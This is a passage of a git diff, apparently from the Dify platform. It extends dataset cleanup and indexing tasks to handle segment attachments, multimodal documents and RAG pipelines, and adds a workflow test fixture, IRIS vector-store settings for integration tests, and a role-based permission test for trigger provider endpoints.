try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py index 5f2a355d16..b4d82a150d 
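The annotation batch-import task above now releases its concurrency slot from a Redis sorted set in a `finally` block. The acquire side is not part of this hunk, so the sketch below is an assumed reconstruction of the full slot lifecycle with redis-py: the key name matches the diff, but `MAX_CONCURRENT`, the TTL policy, and the non-atomic check-then-add are illustrative only (a production version would likely use a Lua script for atomicity).

```python
import time

import redis

r = redis.Redis()
MAX_CONCURRENT = 5       # assumed per-tenant limit
SLOT_TTL_SECONDS = 3600  # assumed auto-expiry for crashed jobs


def try_acquire_slot(tenant_id: str, job_id: str) -> bool:
    key = f"annotation_import_active:{tenant_id}"
    now = time.time()
    # Drop slots older than the TTL so crashed workers don't leak capacity.
    r.zremrangebyscore(key, 0, now - SLOT_TTL_SECONDS)
    if r.zcard(key) >= MAX_CONCURRENT:
        return False
    r.zadd(key, {job_id: now})
    return True


def release_slot(tenant_id: str, job_id: str) -> None:
    # Mirrors the cleanup added to the task's finally block.
    r.zrem(f"annotation_import_active:{tenant_id}", job_id)
```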
100644 --- a/api/tasks/clean_dataset_task.py +++ b/api/tasks/clean_dataset_task.py @@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage +from models import WorkflowType from models.dataset import ( AppDatasetJoin, Dataset, @@ -18,8 +19,11 @@ from models.dataset import ( DatasetQuery, Document, DocumentSegment, + Pipeline, + SegmentAttachmentBinding, ) from models.model import UploadFile +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -33,6 +37,7 @@ def clean_dataset_task( index_struct: str, collection_binding_id: str, doc_form: str, + pipeline_id: str | None = None, ): """ Clean dataset when dataset deleted. @@ -58,14 +63,20 @@ def clean_dataset_task( ) documents = db.session.scalars(select(Document).where(Document.dataset_id == dataset_id)).all() segments = db.session.scalars(select(DocumentSegment).where(DocumentSegment.dataset_id == dataset_id)).all() + # Use JOIN to fetch attachments with bindings in a single query + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where(SegmentAttachmentBinding.tenant_id == tenant_id, SegmentAttachmentBinding.dataset_id == dataset_id) + ).all() # Enhanced validation: Check if doc_form is None, empty string, or contains only whitespace # This ensures all invalid doc_form values are properly handled if doc_form is None or (isinstance(doc_form, str) and not doc_form.strip()): # Use default paragraph index type for empty/invalid datasets to enable vector database cleanup - from core.rag.index_processor.constant.index_type import IndexType + from core.rag.index_processor.constant.index_type import IndexStructureType - doc_form = IndexType.PARAGRAPH_INDEX + doc_form = IndexStructureType.PARAGRAPH_INDEX logger.info( click.style(f"Invalid doc_form detected, using default index type for cleanup: {doc_form}", fg="yellow") ) @@ -90,6 +101,7 @@ def clean_dataset_task( for document in documents: db.session.delete(document) + # delete document file for segment in segments: image_upload_file_ids = get_image_upload_file_ids(segment.content) @@ -107,6 +119,19 @@ def clean_dataset_task( ) db.session.delete(image_file) db.session.delete(segment) + # delete segment attachments + if attachments_with_bindings: + for binding, attachment_file in attachments_with_bindings: + try: + storage.delete(attachment_file.key) + except Exception: + logger.exception( + "Delete attachment_file failed when storage deleted, \ + attachment_file_id: %s", + binding.attachment_id, + ) + db.session.delete(attachment_file) + db.session.delete(binding) db.session.query(DatasetProcessRule).where(DatasetProcessRule.dataset_id == dataset_id).delete() db.session.query(DatasetQuery).where(DatasetQuery.dataset_id == dataset_id).delete() @@ -114,6 +139,14 @@ def clean_dataset_task( # delete dataset metadata db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete() db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete() + # delete pipeline and workflow + if pipeline_id: + db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete() + db.session.query(Workflow).where( + Workflow.tenant_id == tenant_id, + Workflow.app_id == pipeline_id, + Workflow.type == 
WorkflowType.RAG_PIPELINE, + ).delete() # delete files if documents: for document in documents: diff --git a/api/tasks/clean_document_task.py b/api/tasks/clean_document_task.py index 62200715cc..6d2feb1da3 100644 --- a/api/tasks/clean_document_task.py +++ b/api/tasks/clean_document_task.py @@ -9,7 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage -from models.dataset import Dataset, DatasetMetadataBinding, DocumentSegment +from models.dataset import Dataset, DatasetMetadataBinding, DocumentSegment, SegmentAttachmentBinding from models.model import UploadFile logger = logging.getLogger(__name__) @@ -36,6 +36,16 @@ def clean_document_task(document_id: str, dataset_id: str, doc_form: str, file_i raise Exception("Document has no dataset") segments = db.session.scalars(select(DocumentSegment).where(DocumentSegment.document_id == document_id)).all() + # Use JOIN to fetch attachments with bindings in a single query + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.tenant_id == dataset.tenant_id, + SegmentAttachmentBinding.dataset_id == dataset_id, + SegmentAttachmentBinding.document_id == document_id, + ) + ).all() # check segment is exist if segments: index_node_ids = [segment.index_node_id for segment in segments] @@ -69,6 +79,19 @@ def clean_document_task(document_id: str, dataset_id: str, doc_form: str, file_i logger.exception("Delete file failed when document deleted, file_id: %s", file_id) db.session.delete(file) db.session.commit() + # delete segment attachments + if attachments_with_bindings: + for binding, attachment_file in attachments_with_bindings: + try: + storage.delete(attachment_file.key) + except Exception: + logger.exception( + "Delete attachment_file failed when storage deleted, \ + attachment_file_id: %s", + binding.attachment_id, + ) + db.session.delete(attachment_file) + db.session.delete(binding) # delete dataset metadata binding db.session.query(DatasetMetadataBinding).where( diff --git a/api/tasks/deal_dataset_index_update_task.py b/api/tasks/deal_dataset_index_update_task.py index 713f149c38..3d13afdec0 100644 --- a/api/tasks/deal_dataset_index_update_task.py +++ b/api/tasks/deal_dataset_index_update_task.py @@ -4,9 +4,10 @@ import time import click from celery import shared_task # type: ignore -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from models.dataset import Dataset, DocumentSegment from models.dataset import Document as DatasetDocument @@ -28,7 +29,7 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): if not dataset: raise Exception("Dataset not found") - index_type = dataset.doc_form or IndexType.PARAGRAPH_INDEX + index_type = dataset.doc_form or IndexStructureType.PARAGRAPH_INDEX index_processor = IndexProcessorFactory(index_type).init_index_processor() if action == "upgrade": 
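Both cleanup tasks above fetch each `SegmentAttachmentBinding` joined to its `UploadFile` in a single query, then delete the stored blob, the file row, and the binding together. A minimal, runnable SQLAlchemy sketch of that pattern, with the models reduced to the columns the query touches:

```python
from sqlalchemy import Column, String, create_engine, select
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()


class SegmentAttachmentBinding(Base):
    __tablename__ = "segment_attachment_bindings"
    id = Column(String, primary_key=True)
    dataset_id = Column(String)
    attachment_id = Column(String)


class UploadFile(Base):
    __tablename__ = "upload_files"
    id = Column(String, primary_key=True)
    key = Column(String)  # storage path of the blob


engine = create_engine("sqlite://")
Base.metadata.create_all(engine)

with Session(engine) as session:
    rows = session.execute(
        select(SegmentAttachmentBinding, UploadFile)
        .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id)
        .where(SegmentAttachmentBinding.dataset_id == "ds-1")
    ).all()
    for binding, upload_file in rows:
        # Real code first deletes the blob (storage.delete(upload_file.key)),
        # logging rather than aborting on failure, then removes both rows.
        session.delete(upload_file)
        session.delete(binding)
    session.commit()
```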
dataset_documents = ( @@ -119,6 +120,7 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): ) if segments: documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -129,7 +131,7 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): "dataset_id": segment.dataset_id, }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -145,9 +147,25 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): ) child_documents.append(child_document) document.children = child_documents + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) # save vector index - index_processor.load(dataset, documents, with_keywords=False) + index_processor.load( + dataset, documents, multimodal_documents=multimodal_documents, with_keywords=False + ) db.session.query(DatasetDocument).where(DatasetDocument.id == dataset_document.id).update( {"indexing_status": "completed"}, synchronize_session=False ) diff --git a/api/tasks/deal_dataset_vector_index_task.py b/api/tasks/deal_dataset_vector_index_task.py index dc6ef6fb61..1c7de3b1ce 100644 --- a/api/tasks/deal_dataset_vector_index_task.py +++ b/api/tasks/deal_dataset_vector_index_task.py @@ -1,14 +1,14 @@ import logging import time -from typing import Literal import click from celery import shared_task from sqlalchemy import select -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from models.dataset import Dataset, DocumentSegment from models.dataset import Document as DatasetDocument @@ -17,7 +17,7 @@ logger = logging.getLogger(__name__) @shared_task(queue="dataset") -def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "add", "update"]): +def deal_dataset_vector_index_task(dataset_id: str, action: str): """ Async deal dataset from index :param dataset_id: dataset_id @@ -32,7 +32,7 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a if not dataset: raise Exception("Dataset not found") - index_type = dataset.doc_form or IndexType.PARAGRAPH_INDEX + index_type = dataset.doc_form or IndexStructureType.PARAGRAPH_INDEX index_processor = IndexProcessorFactory(index_type).init_index_processor() if action == "remove": index_processor.clean(dataset, None, with_keywords=False) @@ -119,6 +119,7 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a ) if segments: documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -129,7 +130,7 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a "dataset_id": segment.dataset_id, }, ) 
- if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -145,9 +146,25 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a ) child_documents.append(child_document) document.children = child_documents + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) # save vector index - index_processor.load(dataset, documents, with_keywords=False) + index_processor.load( + dataset, documents, multimodal_documents=multimodal_documents, with_keywords=False + ) db.session.query(DatasetDocument).where(DatasetDocument.id == dataset_document.id).update( {"indexing_status": "completed"}, synchronize_session=False ) diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py index fb5eb1d691..cb703cc263 100644 --- a/api/tasks/delete_account_task.py +++ b/api/tasks/delete_account_task.py @@ -2,6 +2,7 @@ import logging from celery import shared_task +from configs import dify_config from extensions.ext_database import db from models import Account from services.billing_service import BillingService @@ -14,7 +15,8 @@ logger = logging.getLogger(__name__) def delete_account_task(account_id): account = db.session.query(Account).where(Account.id == account_id).first() try: - BillingService.delete_account(account_id) + if dify_config.BILLING_ENABLED: + BillingService.delete_account(account_id) except Exception: logger.exception("Failed to delete account %s from billing service.", account_id) raise diff --git a/api/tasks/delete_segment_from_index_task.py b/api/tasks/delete_segment_from_index_task.py index e8cbd0f250..bea5c952cf 100644 --- a/api/tasks/delete_segment_from_index_task.py +++ b/api/tasks/delete_segment_from_index_task.py @@ -6,14 +6,15 @@ from celery import shared_task from core.rag.index_processor.index_processor_factory import IndexProcessorFactory from extensions.ext_database import db -from models.dataset import Dataset, Document +from models.dataset import Dataset, Document, SegmentAttachmentBinding +from models.model import UploadFile logger = logging.getLogger(__name__) @shared_task(queue="dataset") def delete_segment_from_index_task( - index_node_ids: list, dataset_id: str, document_id: str, child_node_ids: list | None = None + index_node_ids: list, dataset_id: str, document_id: str, segment_ids: list, child_node_ids: list | None = None ): """ Async Remove segment from index @@ -49,6 +50,21 @@ def delete_segment_from_index_task( delete_child_chunks=True, precomputed_child_node_ids=child_node_ids, ) + if dataset.is_multimodal: + # delete segment attachment binding + segment_attachment_bindings = ( + db.session.query(SegmentAttachmentBinding) + .where(SegmentAttachmentBinding.segment_id.in_(segment_ids)) + .all() + ) + if segment_attachment_bindings: + attachment_ids = [binding.attachment_id for binding in segment_attachment_bindings] + index_processor.clean(dataset=dataset, node_ids=attachment_ids, with_keywords=False) + for binding in segment_attachment_bindings: + db.session.delete(binding) + # delete upload file + 
db.session.query(UploadFile).where(UploadFile.id.in_(attachment_ids)).delete(synchronize_session=False) + db.session.commit() end_at = time.perf_counter() logger.info(click.style(f"Segment deleted from index latency: {end_at - start_at}", fg="green")) diff --git a/api/tasks/disable_segments_from_index_task.py b/api/tasks/disable_segments_from_index_task.py index 9038dc179b..c2a3de29f4 100644 --- a/api/tasks/disable_segments_from_index_task.py +++ b/api/tasks/disable_segments_from_index_task.py @@ -8,7 +8,7 @@ from sqlalchemy import select from core.rag.index_processor.index_processor_factory import IndexProcessorFactory from extensions.ext_database import db from extensions.ext_redis import redis_client -from models.dataset import Dataset, DocumentSegment +from models.dataset import Dataset, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument logger = logging.getLogger(__name__) @@ -59,6 +59,16 @@ def disable_segments_from_index_task(segment_ids: list, dataset_id: str, documen try: index_node_ids = [segment.index_node_id for segment in segments] + if dataset.is_multimodal: + segment_ids = [segment.id for segment in segments] + segment_attachment_bindings = ( + db.session.query(SegmentAttachmentBinding) + .where(SegmentAttachmentBinding.segment_id.in_(segment_ids)) + .all() + ) + if segment_attachment_bindings: + attachment_ids = [binding.attachment_id for binding in segment_attachment_bindings] + index_node_ids.extend(attachment_ids) index_processor.clean(dataset, index_node_ids, with_keywords=True, delete_child_chunks=False) end_at = time.perf_counter() diff --git a/api/tasks/document_indexing_sync_task.py b/api/tasks/document_indexing_sync_task.py index 4c1f38c3bb..5fc2597c92 100644 --- a/api/tasks/document_indexing_sync_task.py +++ b/api/tasks/document_indexing_sync_task.py @@ -2,7 +2,6 @@ import logging import time import click -import sqlalchemy as sa from celery import shared_task from sqlalchemy import select @@ -12,7 +11,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from extensions.ext_database import db from libs.datetime_utils import naive_utc_now from models.dataset import Dataset, Document, DocumentSegment -from models.source import DataSourceOauthBinding +from services.datasource_provider_service import DatasourceProviderService logger = logging.getLogger(__name__) @@ -48,27 +47,36 @@ def document_indexing_sync_task(dataset_id: str, document_id: str): page_id = data_source_info["notion_page_id"] page_type = data_source_info["type"] page_edited_time = data_source_info["last_edited_time"] + credential_id = data_source_info.get("credential_id") - data_source_binding = ( - db.session.query(DataSourceOauthBinding) - .where( - sa.and_( - DataSourceOauthBinding.tenant_id == document.tenant_id, - DataSourceOauthBinding.provider == "notion", - DataSourceOauthBinding.disabled == False, - DataSourceOauthBinding.source_info["workspace_id"] == f'"{workspace_id}"', - ) - ) - .first() + # Get credentials from datasource provider + datasource_provider_service = DatasourceProviderService() + credential = datasource_provider_service.get_datasource_credentials( + tenant_id=document.tenant_id, + credential_id=credential_id, + provider="notion_datasource", + plugin_id="langgenius/notion_datasource", ) - if not data_source_binding: - raise ValueError("Data source binding not found.") + + if not credential: + logger.error( + "Datasource credential not found for document %s, tenant_id: %s, credential_id: %s", + 
document_id, + document.tenant_id, + credential_id, + ) + document.indexing_status = "error" + document.error = "Datasource credential not found. Please reconnect your Notion workspace." + document.stopped_at = naive_utc_now() + db.session.commit() + db.session.close() + return loader = NotionExtractor( notion_workspace_id=workspace_id, notion_obj_id=page_id, notion_page_type=page_type, - notion_access_token=data_source_binding.access_token, + notion_access_token=credential.get("integration_secret"), tenant_id=document.tenant_id, ) diff --git a/api/tasks/enable_segment_to_index_task.py b/api/tasks/enable_segment_to_index_task.py index 07c44f333e..7615469ed0 100644 --- a/api/tasks/enable_segment_to_index_task.py +++ b/api/tasks/enable_segment_to_index_task.py @@ -4,9 +4,10 @@ import time import click from celery import shared_task -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -67,7 +68,7 @@ def enable_segment_to_index_task(segment_id: str): return index_processor = IndexProcessorFactory(dataset_document.doc_form).init_index_processor() - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -83,8 +84,24 @@ def enable_segment_to_index_task(segment_id: str): ) child_documents.append(child_document) document.children = child_documents + multimodal_documents = [] + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) + # save vector index - index_processor.load(dataset, [document]) + index_processor.load(dataset, [document], multimodal_documents=multimodal_documents) end_at = time.perf_counter() logger.info(click.style(f"Segment enabled to index: {segment.id} latency: {end_at - start_at}", fg="green")) diff --git a/api/tasks/enable_segments_to_index_task.py b/api/tasks/enable_segments_to_index_task.py index c5ca7a6171..9f17d09e18 100644 --- a/api/tasks/enable_segments_to_index_task.py +++ b/api/tasks/enable_segments_to_index_task.py @@ -5,9 +5,10 @@ import click from celery import shared_task from sqlalchemy import select -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -60,6 +61,7 @@ def enable_segments_to_index_task(segment_ids:
list, dataset_id: str, document_i try: documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -71,7 +73,7 @@ def enable_segments_to_index_task(segment_ids: list, dataset_id: str, document_i }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -87,9 +89,24 @@ def enable_segments_to_index_task(segment_ids: list, dataset_id: str, document_i ) child_documents.append(child_document) document.children = child_documents + + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) # save vector index - index_processor.load(dataset, documents) + index_processor.load(dataset, documents, multimodal_documents=multimodal_documents) end_at = time.perf_counter() logger.info(click.style(f"Segments enabled to index latency: {end_at - start_at}", fg="green")) diff --git a/api/tests/fixtures/workflow/end_node_without_value_type_field_workflow.yml b/api/tests/fixtures/workflow/end_node_without_value_type_field_workflow.yml new file mode 100644 index 0000000000..a69339691d --- /dev/null +++ b/api/tests/fixtures/workflow/end_node_without_value_type_field_workflow.yml @@ -0,0 +1,127 @@ +app: + description: 'End node without value_type field reproduction' + icon: 🤖 + icon_background: '#FFEAD5' + mode: workflow + name: end_node_without_value_type_field_reproduction + use_icon_as_answer_icon: false +dependencies: [] +kind: app +version: 0.5.0 +workflow: + conversation_variables: [] + environment_variables: [] + features: + file_upload: + allowed_file_extensions: + - .JPG + - .JPEG + - .PNG + - .GIF + - .WEBP + - .SVG + allowed_file_types: + - image + allowed_file_upload_methods: + - local_file + - remote_url + enabled: false + fileUploadConfig: + audio_file_size_limit: 50 + batch_count_limit: 5 + file_size_limit: 15 + image_file_batch_limit: 10 + image_file_size_limit: 10 + single_chunk_attachment_limit: 10 + video_file_size_limit: 100 + workflow_file_upload_limit: 10 + image: + enabled: false + number_limits: 3 + transfer_methods: + - local_file + - remote_url + number_limits: 3 + opening_statement: '' + retriever_resource: + enabled: true + sensitive_word_avoidance: + enabled: false + speech_to_text: + enabled: false + suggested_questions: [] + suggested_questions_after_answer: + enabled: false + text_to_speech: + enabled: false + language: '' + voice: '' + graph: + edges: + - data: + isInIteration: false + isInLoop: false + sourceType: start + targetType: end + id: 1765423445456-source-1765423454810-target + source: '1765423445456' + sourceHandle: source + target: '1765423454810' + targetHandle: target + type: custom + zIndex: 0 + nodes: + - data: + selected: false + title: 用户输入 + type: start + variables: + - default: '' + hint: '' + label: query + max_length: 48 + options: [] + placeholder: '' + required: true + type: text-input + variable: query + height: 109 + id: '1765423445456' + position: + x: -48 + y: 261 + positionAbsolute: + x: -48 + y: 261 + selected: false + sourcePosition: right + targetPosition: left + type: custom + width: 242 + - data: + outputs: + - value_selector: 
+ - '1765423445456' + - query + variable: query + selected: true + title: 输出 + type: end + height: 88 + id: '1765423454810' + position: + x: 382 + y: 282 + positionAbsolute: + x: 382 + y: 282 + selected: true + sourcePosition: right + targetPosition: left + type: custom + width: 242 + viewport: + x: 139 + y: -135 + zoom: 1 + rag_pipeline_variables: [] diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example index e508ceef66..acc268f1d4 100644 --- a/api/tests/integration_tests/.env.example +++ b/api/tests/integration_tests/.env.example @@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* # Vector database configuration -# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase +# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris VECTOR_STORE=weaviate # Weaviate configuration WEAVIATE_ENDPOINT=http://localhost:8080 @@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false WEAVIATE_BATCH_SIZE=100 WEAVIATE_TOKENIZATION=word +# InterSystems IRIS configuration +IRIS_HOST=localhost +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en + # Upload configuration UPLOAD_FILE_SIZE_LIMIT=15 diff --git a/api/tests/integration_tests/conftest.py b/api/tests/integration_tests/conftest.py index 4395a9815a..948cf8b3a0 100644 --- a/api/tests/integration_tests/conftest.py +++ b/api/tests/integration_tests/conftest.py @@ -1,3 +1,4 @@ +import os import pathlib import random import secrets @@ -32,6 +33,10 @@ def _load_env(): _load_env() +# Override storage root to tmp to avoid polluting repo during local runs +os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage" +os.environ.setdefault("STORAGE_TYPE", "opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/integration_tests/controllers/console/workspace/test_trigger_provider_permissions.py b/api/tests/integration_tests/controllers/console/workspace/test_trigger_provider_permissions.py new file mode 100644 index 0000000000..e55c12e678 --- /dev/null +++ b/api/tests/integration_tests/controllers/console/workspace/test_trigger_provider_permissions.py @@ -0,0 +1,244 @@ +"""Integration tests for Trigger Provider subscription permission verification.""" + +import uuid +from unittest import mock + +import pytest +from flask.testing import FlaskClient + +from controllers.console.workspace import trigger_providers as trigger_providers_api +from libs.datetime_utils import naive_utc_now +from models import Tenant +from models.account import Account, TenantAccountJoin, TenantAccountRole + + +class TestTriggerProviderSubscriptionPermissions: + """Test permission verification for Trigger Provider subscription endpoints.""" + + @pytest.fixture + def mock_account(self, monkeypatch: pytest.MonkeyPatch): + """Create a mock Account for testing.""" + + account = Account(name="Test User", email="test@example.com") + account.id = str(uuid.uuid4()) + account.last_active_at = naive_utc_now() + account.created_at = naive_utc_now() + account.updated_at = naive_utc_now() + + # Create mock tenant + tenant = 
Tenant(name="Test Tenant") + tenant.id = str(uuid.uuid4()) + + mock_session_instance = mock.Mock() + + mock_tenant_join = TenantAccountJoin(role=TenantAccountRole.OWNER) + monkeypatch.setattr(mock_session_instance, "scalar", mock.Mock(return_value=mock_tenant_join)) + + mock_scalars_result = mock.Mock() + mock_scalars_result.one.return_value = tenant + monkeypatch.setattr(mock_session_instance, "scalars", mock.Mock(return_value=mock_scalars_result)) + + mock_session_context = mock.Mock() + mock_session_context.__enter__.return_value = mock_session_instance + monkeypatch.setattr("models.account.Session", lambda _, expire_on_commit: mock_session_context) + + account.current_tenant = tenant + account.current_tenant_id = tenant.id + return account + + @pytest.mark.parametrize( + ("role", "list_status", "get_status", "update_status", "create_status", "build_status", "delete_status"), + [ + # Admin/Owner can do everything + (TenantAccountRole.OWNER, 200, 200, 200, 200, 200, 200), + (TenantAccountRole.ADMIN, 200, 200, 200, 200, 200, 200), + # Editor can list, get, update (parameters), but not create, build, or delete + (TenantAccountRole.EDITOR, 200, 200, 200, 403, 403, 403), + # Normal user cannot do anything + (TenantAccountRole.NORMAL, 403, 403, 403, 403, 403, 403), + # Dataset operator cannot do anything + (TenantAccountRole.DATASET_OPERATOR, 403, 403, 403, 403, 403, 403), + ], + ) + def test_trigger_subscription_permissions( + self, + test_client: FlaskClient, + auth_header, + monkeypatch, + mock_account, + role: TenantAccountRole, + list_status: int, + get_status: int, + update_status: int, + create_status: int, + build_status: int, + delete_status: int, + ): + """Test that different roles have appropriate permissions for trigger subscription operations.""" + # Set user role + mock_account.role = role + + # Mock current user + monkeypatch.setattr(trigger_providers_api, "current_user", mock_account) + + # Mock AccountService.load_user to prevent authentication issues + from services.account_service import AccountService + + mock_load_user = mock.Mock(return_value=mock_account) + monkeypatch.setattr(AccountService, "load_user", mock_load_user) + + # Test data + provider = "some_provider/some_trigger" + subscription_builder_id = str(uuid.uuid4()) + subscription_id = str(uuid.uuid4()) + + # Mock service methods + mock_list_subscriptions = mock.Mock(return_value=[]) + monkeypatch.setattr( + "services.trigger.trigger_provider_service.TriggerProviderService.list_trigger_provider_subscriptions", + mock_list_subscriptions, + ) + + mock_get_subscription_builder = mock.Mock(return_value={"id": subscription_builder_id}) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.get_subscription_builder_by_id", + mock_get_subscription_builder, + ) + + mock_update_subscription_builder = mock.Mock(return_value={"id": subscription_builder_id}) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.update_trigger_subscription_builder", + mock_update_subscription_builder, + ) + + mock_create_subscription_builder = mock.Mock(return_value={"id": subscription_builder_id}) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.create_trigger_subscription_builder", + mock_create_subscription_builder, + ) + + mock_update_and_build_builder = mock.Mock() + monkeypatch.setattr( + 
"services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.update_and_build_builder", + mock_update_and_build_builder, + ) + + mock_delete_provider = mock.Mock() + mock_delete_plugin_trigger = mock.Mock() + mock_db_session = mock.Mock() + mock_db_session.commit = mock.Mock() + + def mock_session_func(engine=None): + return mock_session_context + + mock_session_context = mock.Mock() + mock_session_context.__enter__.return_value = mock_db_session + mock_session_context.__exit__.return_value = None + + monkeypatch.setattr("services.trigger.trigger_provider_service.Session", mock_session_func) + monkeypatch.setattr("services.trigger.trigger_subscription_operator_service.Session", mock_session_func) + + monkeypatch.setattr( + "services.trigger.trigger_provider_service.TriggerProviderService.delete_trigger_provider", + mock_delete_provider, + ) + monkeypatch.setattr( + "services.trigger.trigger_subscription_operator_service.TriggerSubscriptionOperatorService.delete_plugin_trigger_by_subscription", + mock_delete_plugin_trigger, + ) + + # Test 1: List subscriptions (should work for Editor, Admin, Owner) + 